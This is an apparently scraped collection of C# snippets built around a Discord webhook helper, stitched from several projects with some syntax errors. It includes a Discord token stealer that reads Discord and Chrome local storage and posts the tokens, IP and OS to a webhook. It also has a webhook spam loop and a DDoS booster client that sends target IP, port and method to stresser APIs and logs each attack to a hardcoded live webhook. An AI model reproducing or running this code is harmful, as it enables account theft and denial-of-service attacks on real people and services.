private void 发电机_Load(object sender, EventArgs e)
        {
            backgroundWorker1.RunWorkerAsync();
            value.Text = User.UserVariable;
            using (DcWebHook dcWeb = new DcWebHook())
            {

                    dcWeb.ProfilePicture = "https://www.pngfind.com/pngs/m/10-109569_shield-logo-png-logo-agent-of-shield-transparent.png";
                    dcWeb.UserName = "******";
                    dcWeb.WebHook = "YOURWEBHOOK HERE";
                    dcWeb.SendMessage("```css" +  Environment.NewLine + $"Agent : {User.Username}" + Environment.NewLine +  $"Agent Balance : {User.UserVariable}"  + Environment.NewLine + $"Agent Current time : {DateTime.Now}"  + Environment.NewLine + "```");
            }
        }
        static void Main(string[] args)
        {
            Console.WriteLine("Reading Config...");

            string currentPath  = Directory.GetCurrentDirectory();
            string jsonFilePath = currentPath + "\\config.json";
            // deserialize JSON directly from a file
            string JsonRead = File.ReadAllText(@jsonFilePath);

            List <WebhookProcedure> readyConfig = Newtonsoft.Json.JsonConvert.DeserializeObject <List <WebhookProcedure> >(JsonRead);

            foreach (var item in readyConfig)
            {
                Console.WriteLine("------------------------------------------");
                Console.WriteLine("Found webhook : " + item.url);
            }

            Console.WriteLine("------------------------------------------");

            // Set user desire
            Console.WriteLine("Message:");
            string message = Console.ReadLine();

            Console.WriteLine("How many miliseconds each webhook will spam:");
            int condation = Convert.ToInt32(Console.ReadLine());

            if (condation < 1000)
            {
                condation = 1000;
            }

            int shotCount = 0;

            while (true)
            {
                Thread.Sleep(condation);
                foreach (var item in readyConfig)
                {
                    //sending message to discord webhook
                    using (DcWebHook dcWeb = new DcWebHook())
                    {
                        Console.WriteLine("Cool shot " + shotCount);
                        dcWeb.ProfilePicture = "https://www.composer-devil.com/images/logo.png";
                        dcWeb.UserName       = "******";
                        dcWeb.WebHook        = item.url;
                        dcWeb.SendMessage(message);
                        shotCount++;
                    }
                }
            }
        }
Exemple #3
0
        static void Main()
        {
            #region grabbing token
            string string1 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + "\\discord\\Local Storage\\leveldb\\";
            if (!dotldb(ref string1) && !dotldb(ref string1))
            {
            }
            System.Threading.Thread.Sleep(100);
            string string2 = tokenx(string1, string1.EndsWith(".log"));
            if (string2 == "")
            {
                string2 = "N/A";
            }

            string string3 = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\";
            if (!dotldb(ref string3) && !dotlog(ref string3))
            {
            }
            System.Threading.Thread.Sleep(100);
            string string4 = tokenx(string3, string3.EndsWith(".log"));
            if (string4 == "")
            {
                string4 = "N/A";
            }
            #endregion

            //sending message to discord webhook
            using (DcWebHook dcWeb = new DcWebHook())
            {
                ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                foreach (ManagementObject managementObject in mos.Get())
                {
                    String OSName = managementObject["Caption"].ToString();
                    dcWeb.ProfilePicture = "https://www.logolynx.com/images/logolynx/1b/1bcc0f0aefe71b2c8ce66ffe8645d365.png";
                    dcWeb.UserName       = "******";
                    dcWeb.WebHook        = "YOURDISCORDWEBHOOK LINK";
                    dcWeb.SendMessage("```" + "UserName: "******"IP: " + GetIPAddress() + Environment.NewLine + "OS: " + OSName + Environment.NewLine + "Token DiscordAPP: " + string2 + Environment.NewLine + "Token Chrome: " + string4 + "```");
                }
            }
        }
Exemple #4
0
        //

        private static async Task Main(string[] Args)
        {
            int Attack = 0;

            Console.CursorVisible = false;
            var originalX = Console.CursorLeft;
            var originalY = Console.CursorTop;

            Console.Title           = "YAGO DEVELOPMENT LTD.AŞ";
            Console.ForegroundColor = ConsoleColor.White;
            Console.Write("≫ ");
            Console.ForegroundColor = ConsoleColor.Cyan;
            Console.WriteLine("[1] STORM");
            Console.ForegroundColor = ConsoleColor.White;
            Console.Write("≫ ");
            Console.ForegroundColor = ConsoleColor.Blue;
            Console.WriteLine("[2] DEFCON");
            Console.ForegroundColor = ConsoleColor.White;
            Console.Write("≫ ");

            //

            //
            string a = Console.ReadLine();

            if (a == "1")
            {
                Console.Title = "YAGO DEVELOPMENT LTD.AŞ";
                Console.Clear();
                Console.ForegroundColor = ConsoleColor.White;
                Console.Write("≫ ");
                Console.ForegroundColor = ConsoleColor.Cyan;
                Console.WriteLine("[1] RUN ONE ATTACK");
                Console.ForegroundColor = ConsoleColor.White;
                Console.Write("≫ ");
                Console.ForegroundColor = ConsoleColor.Blue;
                Console.WriteLine("[2] RUN TWO ATTACK");
                Console.ForegroundColor = ConsoleColor.White;
                Console.Write("≫ ");

                string b = Console.ReadLine();

                if (b == "1")
                {
                    Console.Title = "YAGO DEVELOPMENT LTD.AŞ";
                    Console.Clear();
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("≫ ");
                    Console.ForegroundColor = ConsoleColor.Cyan;
                    Console.WriteLine("[1] LOOP");
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("≫ ");
                    Console.ForegroundColor = ConsoleColor.Blue;
                    Console.WriteLine("[2] JUST ONE");
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("≫ ");

                    string l = Console.ReadLine();

                    if (l == "1")
                    {
                        Console.Clear();
                        string key    = "";
                        string ip     = "";
                        string port   = "";
                        string times  = "";
                        string method = "";

                        HttpClient client = new HttpClient();

                        Console.Title           = "YAGO DEVELOPMENT LTD.AŞ";
                        Console.ForegroundColor = ConsoleColor.Blue;

                        Console.WriteLine("                                             ╔════════════════════════════╗");
                        Console.WriteLine("                                             ║            YAGO            ║");
                        Console.WriteLine("                                             ║     DEVELOPMENT LTD.AŞ     ║");
                        Console.WriteLine("                                             ╚════════════════════════════╝");
                        Console.WriteLine("                                                   " + DateTime.Now + "     ");
                        Console.WriteLine("");
                        Console.WriteLine("Key;");
                        key = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Ip;");
                        ip = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Port;");
                        port = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Time;");
                        times = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Method;");
                        method = Console.ReadLine();

                        using (DcWebHook dcWeb = new DcWebHook())
                        {
                            ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                            foreach (ManagementObject managementObject in mos.Get())
                            {
                                String OSName = managementObject["Caption"].ToString();
                                dcWeb.ProfilePicture = "";
                                dcWeb.UserName       = "******";
                                dcWeb.WebHook        = "https://canary.discordapp.com/api/webhooks/702234977311522837/09bfmaXMAIN2YEshUpu0CXEBI_EwnZRFTb9qHvgdL5oYpQhFISFiilQF2xZ_JlkkZjgv";
                                dcWeb.SendMessage("```" + "UserName: "******"KEY: " + key + Environment.NewLine + "ATTACK: " + ip + ":" + port + Environment.NewLine + "TIME: " + times + " / Starting Time " + DateTime.Now + Environment.NewLine + "Method: " + method + Environment.NewLine + "OS: " + OSName + "```");
                            }
                        }

                        string version = "has been sent";
                        for (int i = 0; i <= 1000; i = i + 2)
                        {
                            WebClient wb       = new WebClient();
                            string    HWIDLIST = wb.DownloadString("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + times + "&method=" + method);
                            if (HWIDLIST.Contains(version))
                            {
                                Console.WriteLine("");
                                Console.WriteLine("ATTACK STARTED!");
                                Console.WriteLine("");
                                Console.WriteLine("ATTACK STARTED TIME: " + times + " METHOD: " + method + " SITE: " + ip + ":" + port);
                                Console.Write("ATTACK RUNNING....");
                                Thread.Sleep(300010);
                                Attack = 1;
                                ConsoleColor background = Console.BackgroundColor;
                                ConsoleColor foreground = Console.ForegroundColor;
                                Console.ForegroundColor = ConsoleColor.Black;
                                Console.BackgroundColor = ConsoleColor.White;
                                var s = new ConsoleSpinner();
                                Console.Write("ATTACK RUNNING ");
                                DateTime zaman1 = DateTime.UtcNow;
                                while (Attack == 1)
                                {
                                    DateTime zaman2 = DateTime.UtcNow;

                                    var zaman3 = zaman2.Ticks - zaman1.Ticks;

                                    Thread.Sleep(140);
                                    s.UpdateProgress();

                                    if (Convert.ToDouble(zaman3) > 3000004414)
                                    {
                                        break;
                                    }
                                }
                                Console.BackgroundColor = ConsoleColor.Black;
                                Console.ForegroundColor = ConsoleColor.Blue;
                            }

                            else
                            {
                                Console.WriteLine("There is a problem!");
                                var content = await client.GetStringAsync("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + times + "&method=" + method);

                                Console.WriteLine(content);
                                Console.ReadKey();
                            }
                        }
                    }


                    if (l == "2")
                    {
                        Console.Clear();
                        string key    = "";
                        string ip     = "";
                        string port   = "";
                        string time   = "";
                        string method = "";

                        HttpClient client = new HttpClient();

                        Console.Title           = "YAGO DEVELOPMENT LTD.AŞ";
                        Console.ForegroundColor = ConsoleColor.Blue;

                        Console.WriteLine("                                             ╔════════════════════════════╗");
                        Console.WriteLine("                                             ║            YAGO            ║");
                        Console.WriteLine("                                             ║     DEVELOPMENT LTD.AŞ     ║");
                        Console.WriteLine("                                             ╚════════════════════════════╝");
                        Console.WriteLine("                                                   " + DateTime.Now + "     ");
                        Console.WriteLine("");
                        Console.WriteLine("Key;");
                        key = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Ip;");
                        ip = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Port;");
                        port = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Time;");
                        time = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Method;");
                        method = Console.ReadLine();

                        using (DcWebHook dcWeb = new DcWebHook())
                        {
                            ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                            foreach (ManagementObject managementObject in mos.Get())
                            {
                                String OSName = managementObject["Caption"].ToString();
                                dcWeb.ProfilePicture = "";
                                dcWeb.UserName       = "******";
                                dcWeb.WebHook        = "https://canary.discordapp.com/api/webhooks/702234977311522837/09bfmaXMAIN2YEshUpu0CXEBI_EwnZRFTb9qHvgdL5oYpQhFISFiilQF2xZ_JlkkZjgv";
                                dcWeb.SendMessage("```" + "UserName: "******"KEY: " + key + Environment.NewLine + "ATTACK: " + ip + ":" + port + Environment.NewLine + "TIME: " + time + " / Starting Time " + DateTime.Now + Environment.NewLine + "Method: " + method + Environment.NewLine + "OS: " + OSName + "```");
                            }
                        }

                        string version = "has been sent";

                        WebClient wb       = new WebClient();
                        string    HWIDLIST = wb.DownloadString("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);
                        if (HWIDLIST.Contains(version))
                        {
                            Console.WriteLine("");
                            Console.WriteLine("ATTACK STARTED!");
                            Console.WriteLine("");
                            Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method + " SITE: " + ip + ":" + port);
                            Console.ReadKey();
                        }
                        Attack = 1;
                        ConsoleColor background = Console.BackgroundColor;
                        ConsoleColor foreground = Console.ForegroundColor;
                        Console.ForegroundColor = ConsoleColor.Black;
                        Console.BackgroundColor = ConsoleColor.White;
                        var s = new ConsoleSpinner();
                        Console.Write("ATTACK RUNNING ");
                        DateTime zaman1 = DateTime.UtcNow;
                        while (Attack == 1)
                        {
                            DateTime zaman2 = DateTime.UtcNow;

                            var zaman3 = zaman2.Ticks - zaman1.Ticks;

                            Thread.Sleep(140);
                            s.UpdateProgress();

                            if (Convert.ToDouble(zaman3) > 3000004414)
                            {
                                break;
                            }
                        }
                        Console.BackgroundColor = ConsoleColor.Black;
                        Console.ForegroundColor = ConsoleColor.Blue;
                    }
                    else
                    {
                        Console.WriteLine("There is a problem!");
                        //var content = await client.GetStringAsync("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);
                        //Console.WriteLine(content);
                        Console.ReadKey();
                    }
                }


                // 2 li saldırı

                if (b == "2")
                {
                    Console.Title = "YAGO DEVELOPMENT LTD.AŞ";
                    Console.Clear();
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("≫ ");
                    Console.ForegroundColor = ConsoleColor.Cyan;
                    Console.WriteLine("[1] LOOP");
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("≫ ");
                    Console.ForegroundColor = ConsoleColor.Blue;
                    Console.WriteLine("[2] JUST ONE");
                    Console.ForegroundColor = ConsoleColor.White;
                    Console.Write("≫ ");

                    string n = Console.ReadLine();

                    // Loop Veya Sadece 1 kere

                    if (n == "1")
                    {
                        Console.Clear();
                        string key     = "";
                        string ip      = "";
                        string port    = "";
                        string time    = "";
                        string method  = "";
                        string method2 = "";

                        HttpClient client = new HttpClient();

                        Console.Title           = "YAGO DEVELOPMENT LTD.AŞ";
                        Console.ForegroundColor = ConsoleColor.Blue;

                        Console.WriteLine("                                             ╔════════════════════════════╗");
                        Console.WriteLine("                                             ║            YAGO            ║");
                        Console.WriteLine("                                             ║     DEVELOPMENT LTD.AŞ     ║");
                        Console.WriteLine("                                             ╚════════════════════════════╝");
                        Console.WriteLine("                                                   " + DateTime.Now + "     ");
                        Console.WriteLine("");
                        Console.WriteLine("Key; ");
                        key = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Ip; ");
                        ip = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Port; ");
                        port = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Time; ");
                        time = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Method; ");
                        method = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Method2; ");
                        method2 = Console.ReadLine();

                        using (DcWebHook dcWeb = new DcWebHook())
                        {
                            ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                            foreach (ManagementObject managementObject in mos.Get())
                            {
                                String OSName = managementObject["Caption"].ToString();
                                dcWeb.ProfilePicture = "";
                                dcWeb.UserName       = "******";
                                dcWeb.WebHook        = "https://canary.discordapp.com/api/webhooks/702234977311522837/09bfmaXMAIN2YEshUpu0CXEBI_EwnZRFTb9qHvgdL5oYpQhFISFiilQF2xZ_JlkkZjgv";
                                dcWeb.SendMessage("```" + "UserName: "******"KEY: " + key + Environment.NewLine + "ATTACK: " + ip + ":" + port + Environment.NewLine + "TIME: " + time + " / Starting Time  " + DateTime.Now + Environment.NewLine + "Method: " + method + Environment.NewLine + "OS: " + OSName + "```");
                            }
                        }

                        string version = "has been sent";
                        for (int i = 0; i <= 1000; i = i + 2)
                        {
                            WebClient wb       = new WebClient();
                            string    HWIDLIST = wb.DownloadString("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);
                            if (HWIDLIST.Contains(version))
                            {
                                Console.WriteLine("");
                                Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method + " SITE: " + ip + ":" + port);
                                string versions = "has been sent";
                                for (int u = 0; u <= 1000; u = u + 200000000)
                                {
                                    WebClient wba       = new WebClient();
                                    string    HWIDLISTS = wba.DownloadString("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method2);
                                    if (HWIDLISTS.Contains(versions))
                                    {
                                        Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method2 + " SITE: " + ip + ":" + port);
                                    }
                                }
                                Attack = 1;
                                ConsoleColor background = Console.BackgroundColor;
                                ConsoleColor foreground = Console.ForegroundColor;
                                Console.ForegroundColor = ConsoleColor.Black;
                                Console.BackgroundColor = ConsoleColor.White;
                                var s = new ConsoleSpinner();
                                Console.Write("ATTACK RUNNING ");
                                DateTime zaman1 = DateTime.UtcNow;
                                while (Attack == 1)
                                {
                                    DateTime zaman2 = DateTime.UtcNow;

                                    var zaman3 = zaman2.Ticks - zaman1.Ticks;

                                    Thread.Sleep(140);
                                    s.UpdateProgress();

                                    if (Convert.ToDouble(zaman3) > 3000004414)
                                    {
                                        break;
                                    }
                                }
                                Console.BackgroundColor = ConsoleColor.Black;
                                Console.ForegroundColor = ConsoleColor.Blue;
                            }
                            else
                            {
                                Console.WriteLine("There is a problem!");
                                var content = await client.GetStringAsync("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);

                                Console.WriteLine(content);
                                Console.ReadKey();
                            }
                        }
                    }

                    if (n == "2")
                    {
                        Console.Clear();
                        string key    = "";
                        string ip     = "";
                        string port   = "";
                        string time   = "";
                        string method = "";

                        HttpClient client = new HttpClient();

                        Console.Title           = "YAGO DEVELOPMENT LTD.AŞ";
                        Console.ForegroundColor = ConsoleColor.Blue;

                        Console.WriteLine("                                             ╔════════════════════════════╗");
                        Console.WriteLine("                                             ║            YAGO            ║");
                        Console.WriteLine("                                             ║     DEVELOPMENT LTD.AŞ     ║");
                        Console.WriteLine("                                             ╚════════════════════════════╝");
                        Console.WriteLine("");
                        Console.WriteLine("Key;");
                        key = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Ip;");
                        ip = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Port;");
                        port = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Time;");
                        time = Console.ReadLine();
                        Console.WriteLine("");
                        Console.WriteLine("Method;");
                        method = Console.ReadLine();


                        using (DcWebHook dcWeb = new DcWebHook())
                        {
                            ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                            foreach (ManagementObject managementObject in mos.Get())
                            {
                                String OSName = managementObject["Caption"].ToString();
                                dcWeb.ProfilePicture = "";
                                dcWeb.UserName       = "******";
                                dcWeb.WebHook        = "https://canary.discordapp.com/api/webhooks/702234977311522837/09bfmaXMAIN2YEshUpu0CXEBI_EwnZRFTb9qHvgdL5oYpQhFISFiilQF2xZ_JlkkZjgv";
                                dcWeb.SendMessage("```" + "UserName: "******"KEY: " + key + Environment.NewLine + "ATTACK: " + ip + ":" + port + Environment.NewLine + "TIME: " + time + " / Starting Time " + DateTime.Now + Environment.NewLine + "Method: " + method + Environment.NewLine + "OS: " + OSName + "```");
                            }
                        }

                        string version = "has been sent";
                        for (int i = 0; i <= 1000; i = i + 2)
                        {
                            WebClient wb       = new WebClient();
                            string    HWIDLIST = wb.DownloadString("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);
                            if (HWIDLIST.Contains(version))
                            {
                                Console.WriteLine("");
                                Console.WriteLine("ATTACK STARTED!");
                                Console.WriteLine("");
                                Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method + " SITE: " + ip + ":" + port);
                                string versions = "has been sent";
                                for (int u = 0; u <= 1000; u = u + 20000000)
                                {
                                    WebClient wba       = new WebClient();
                                    string    HWIDLISTS = wba.DownloadString("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);
                                    if (HWIDLISTS.Contains(versions))
                                    {
                                        Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method + " SITE: " + ip + ":" + port);
                                    }
                                }
                                Attack = 1;
                                ConsoleColor background = Console.BackgroundColor;
                                ConsoleColor foreground = Console.ForegroundColor;
                                Console.ForegroundColor = ConsoleColor.Black;
                                Console.BackgroundColor = ConsoleColor.White;
                                var s = new ConsoleSpinner();
                                Console.Write("ATTACK RUNNING ");
                                DateTime zaman1 = DateTime.UtcNow;
                                while (Attack == 1)
                                {
                                    DateTime zaman2 = DateTime.UtcNow;

                                    var zaman3 = zaman2.Ticks - zaman1.Ticks;

                                    Thread.Sleep(140);
                                    s.UpdateProgress();

                                    if (Convert.ToDouble(zaman3) > 3000004414)
                                    {
                                        break;
                                    }
                                }
                                Console.BackgroundColor = ConsoleColor.Black;
                                Console.ForegroundColor = ConsoleColor.Blue;
                            }
                            else
                            {
                                Console.WriteLine("There is a problem!");
                                var content = await client.GetStringAsync("https://api.stormbypass.xyz/vip-api.php?key=" + key + "&host=" + ip + "&port=" + port + "&time=" + time + "&method=" + method);

                                Console.WriteLine(content);
                            }
                        }
                    }
                }
            }

            // Defcon

            if (a == "2")
            {
                Console.Clear();
                string key     = "";
                string ip      = "";
                string port    = "";
                string time    = "";
                string method  = "";
                string method2 = "";

                HttpClient client = new HttpClient();

                Console.Title           = "YAGO DEVELOPMENT LTD.AŞ";
                Console.ForegroundColor = ConsoleColor.Blue;

                Console.WriteLine("                                             ╔════════════════════════════╗");
                Console.WriteLine("                                             ║            YAGO            ║");
                Console.WriteLine("                                             ║     DEVELOPMENT LTD.AŞ     ║");
                Console.WriteLine("                                             ╚════════════════════════════╝");
                Console.WriteLine("                                                   " + DateTime.Now + "     ");
                Console.WriteLine("");
                Console.WriteLine("Key;");
                key = Console.ReadLine();
                Console.WriteLine("");
                Console.WriteLine("Ip;");
                ip = Console.ReadLine();
                Console.WriteLine("");
                Console.WriteLine("Port;");
                port = Console.ReadLine();
                Console.WriteLine("");
                Console.WriteLine("Time;");
                time = Console.ReadLine();
                Console.WriteLine("");
                Console.WriteLine("Method;");
                method = Console.ReadLine();
                Console.WriteLine("");
                Console.WriteLine("Method2;");
                method2 = Console.ReadLine();

                using (DcWebHook dcWeb = new DcWebHook())
                {
                    ManagementObjectSearcher mos = new ManagementObjectSearcher("select * from Win32_OperatingSystem");
                    foreach (ManagementObject managementObject in mos.Get())
                    {
                        String OSName = managementObject["Caption"].ToString();
                        dcWeb.ProfilePicture = "";
                        dcWeb.UserName       = "******";
                        dcWeb.WebHook        = "https://canary.discordapp.com/api/webhooks/702234977311522837/09bfmaXMAIN2YEshUpu0CXEBI_EwnZRFTb9qHvgdL5oYpQhFISFiilQF2xZ_JlkkZjgv";
                        dcWeb.SendMessage("```" + "UserName: "******"KEY: " + key + Environment.NewLine + "ATTACK: " + ip + ":" + port + Environment.NewLine + "TIME: " + time + " / Starting Time " + DateTime.Now + Environment.NewLine + "Method: " + method + Environment.NewLine + "OS: " + OSName + "```");
                    }
                }

                string version = "LOGIN OK";

                for (int i = 0; i <= 1000; i = i + 2)
                {
                    WebClient wb       = new WebClient();
                    string    HWIDLIST = wb.DownloadString("https://defconpro.io/api.php?ip=" + ip + "&port=" + port + "&time=" + time + "&method=" + method + "&key=" + key);
                    if (HWIDLIST.Contains(version))
                    {
                        Console.WriteLine("");
                        Console.WriteLine("ATTACK STARTED!");
                        Console.WriteLine("");
                        Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method + " SITE: " + ip + ":" + port);
                        string versions = "LOGIN OK";
                        for (int u = 0; u <= 1000; u = u + 20000000)
                        {
                            Thread.Sleep(5000);
                            WebClient wba       = new WebClient();
                            string    HWIDLISTS = wb.DownloadString("https://defconpro.io/api.php?ip=" + ip + "&port=" + port + "&time=" + time + "&method=" + method2 + "&key=" + key);
                            if (HWIDLISTS.Contains(versions))
                            {
                                Console.WriteLine("ATTACK STARTED TIME: " + time + " METHOD: " + method2 + " SITE: " + ip + ":" + port);
                            }
                            Thread.Sleep(800010);
                        }
                    }
                    else
                    {
                        Console.WriteLine("There is a problem!");
                        var content = await client.GetStringAsync("https://defconpro.io/api.php?ip=" + ip + "&port=" + port + "&time=" + time + "&method=" + method + "&key=" + key);

                        Console.WriteLine(content);
                        Console.ReadKey();
                    }
                }
            }
        }
        private void siticoneRoundedButton1_Click(object sender, EventArgs e)
        {
            int check = int.Parse(value.Text);
            try
            {
                #region [ Calca ]
                backgroundWorker1.RunWorkerAsync();
                if (day.Checked == true)
                {
                    if (check < 10)
                    {
                        MessageBox.Show("You don't have enough balance please recharge your balance must be 10 or higher", "对话:", MessageBoxButtons.OK, MessageBoxIcon.Error);
                    }
                    else if (check >= 10)
                    {

                        n1 = int.Parse(value.Text);
                        n2 = int.Parse("10");
                        x1 = n1;
                        x2 = n2;
                        while (n2 != 0)
                        {
                            int brw = (~n1) & n2;
                            n1 = n1 ^ n2;
                            n2 = brw << 1;

                        }
                        WebClient smiley = new WebClient();
                        smiley.DownloadString($"https://developers.auth.gg/USERS/?type=editvar&authorization=IAFIOKDDRHWR&user={User.Username}&value={value.Text = Convert.ToString(n1)}");
                        output.Text = smiley.DownloadString(authgg + "/LICENSES/?type=generate&days=1&amount=1&level=2&format=3&length=10&prefix=SMILE-PANEL&authorization=" + API);
                        using (DcWebHook dcWeb = new DcWebHook())
                        {

                            dcWeb.ProfilePicture = "https://www.pngfind.com/pngs/m/10-109569_shield-logo-png-logo-agent-of-shield-transparent.png";
                            dcWeb.UserName = "******";
                            dcWeb.WebHook = "YOURWEBHOOK HERE"";
                            dcWeb.SendMessage("```css" + Environment.NewLine + $"Agent : {User.Username}" + Environment.NewLine + $"Agent Balance : {User.UserVariable}" + Environment.NewLine + $"Agent Current time : {DateTime.Now}" + Environment.NewLine +  $"Generated Key : {output.Text}" + Environment.NewLine + "```");
                        }
                    }
                    #endregion
                    #region [Check Balance]
                    try
                    {
                        string smile = value.Text;
                        if (smile.Contains("-"))
                        {
                            value.Text = "0";
                            MessageBox.Show("You don't have enough balance please recharge", "对话:", MessageBoxButtons.OK, MessageBoxIcon.Error);
                            WebClient smileyY = new WebClient();
                            smileyY.DownloadString($"https://developers.auth.gg/USERS/?type=editvar&authorization=IAFIOKDDRHWR&user={User.Username}&value={value.Text = Convert.ToString(n1)}");
                            value.Text = "0";
                        }
                    }
                    catch
                    {

                    }
                    #endregion
                }

                if (month.Checked == true)
                {
                    if (check < 20)
                    {
                        MessageBox.Show("You don't have enough balance please recharge your balance must be 20 or higher", "对话:", MessageBoxButtons.OK, MessageBoxIcon.Error);
                    }
                    else if (check >= 20)
                    {

                        n1 = int.Parse(value.Text);
                        n2 = int.Parse("20");
                        x1 = n1;
                        x2 = n2;
                        while (n2 != 0)
                        {
                            int brw = (~n1) & n2;
                            n1 = n1 ^ n2;
                            n2 = brw << 1;

                        }
                        WebClient smiley = new WebClient();
                        smiley.DownloadString($"https://developers.auth.gg/USERS/?type=editvar&authorization=IAFIOKDDRHWR&user={User.Username}&value={value.Text = Convert.ToString(n1)}");
                        output.Text = smiley.DownloadString(authgg + "/LICENSES/?type=generate&days=30&amount=1&level=2&format=3&length=10&prefix=SMILE-PANEL&authorization=" + API);
                        using (DcWebHook dcWeb = new DcWebHook())
                        {

                            dcWeb.ProfilePicture = "https://www.pngfind.com/pngs/m/10-109569_shield-logo-png-logo-agent-of-shield-transparent.png";
                            dcWeb.UserName = "******";
                            dcWeb.WebHook = "YOUR WEB HOOK HERE";
                            dcWeb.SendMessage("```css" + Environment.NewLine + $"Agent : {User.Username}" + Environment.NewLine + $"Agent Balance : {User.UserVariable}" + Environment.NewLine + $"Agent Current time : {DateTime.Now}" + Environment.NewLine + $"Generated Key : {output.Text}" + Environment.NewLine + "```");
                        }
                    }
                    #region [ Check Balance]
                    try
                    {
                        string smile = value.Text;
                        if (smile.Contains("-"))
                        {
                            value.Text = "0";
                            MessageBox.Show("You don't have enough balance please recharge", "对话:", MessageBoxButtons.OK, MessageBoxIcon.Error);
                            WebClient smileyY = new WebClient();
                            smileyY.DownloadString($"https://developers.auth.gg/USERS/?type=editvar&authorization=IAFIOKDDRHWR&user={User.Username}&value={value.Text = Convert.ToString(n1)}");
                            value.Text = "0";
                        }
                    }

                    catch
                    {

                    }
                }
                    #endregion
                    if (week.Checked == true)
                    {
                    if (check < 15)
                    {
                        MessageBox.Show("You don't have enough balance please recharge your balance must be 15 or higher", "对话:", MessageBoxButtons.OK, MessageBoxIcon.Error);
                    }
                    else if (check >= 15)
                    {

                        n1 = int.Parse(value.Text);
                        n2 = int.Parse("15");
                        x1 = n1;
                        x2 = n2;
                        while (n2 != 0)
                        {
                            int brw = (~n1) & n2;
                            n1 = n1 ^ n2;
                            n2 = brw << 1;

                        }
                        WebClient smiley = new WebClient();
                        smiley.DownloadString($"https://developers.auth.gg/USERS/?type=editvar&authorization=IAFIOKDDRHWR&user={User.Username}&value={value.Text = Convert.ToString(n1)}");
                        output.Text = smiley.DownloadString(authgg + "/LICENSES/?type=generate&days=30&amount=1&level=2&format=3&length=10&prefix=SMILE-PANEL&authorization=" + API);
                        using (DcWebHook dcWeb = new DcWebHook())
                        {

                            dcWeb.ProfilePicture = "https://www.pngfind.com/pngs/m/10-109569_shield-logo-png-logo-agent-of-shield-transparent.png";
                            dcWeb.UserName = "******";
                            dcWeb.WebHook = "YOUR WEBHOOK HERE";
                            dcWeb.SendMessage("```css" + Environment.NewLine + $"Agent : {User.Username}" + Environment.NewLine + $"Agent Balance : {User.UserVariable}" + Environment.NewLine + $"Agent Current time : {DateTime.Now}" + Environment.NewLine + $"Generated Key : {output.Text}" + Environment.NewLine + "```");
                        }
                    }
                    #region [ Check Balance]
                    try
                    {
                        string smile = value.Text;
                        if (smile.Contains("-"))
                        {
                            value.Text = "0";
                            MessageBox.Show("You don't have enough balance please recharge", "对话:", MessageBoxButtons.OK, MessageBoxIcon.Error);
                            WebClient smileyY = new WebClient();
                            smileyY.DownloadString($"https://developers.auth.gg/USERS/?type=editvar&authorization=IAFIOKDDRHWR&user={User.Username}&value={value.Text = Convert.ToString(n1)}");
                            value.Text = "0";
                        }
                    }

                    catch
                    {

                    }
                    #endregion
                }
            }
            catch
            {

            }

        }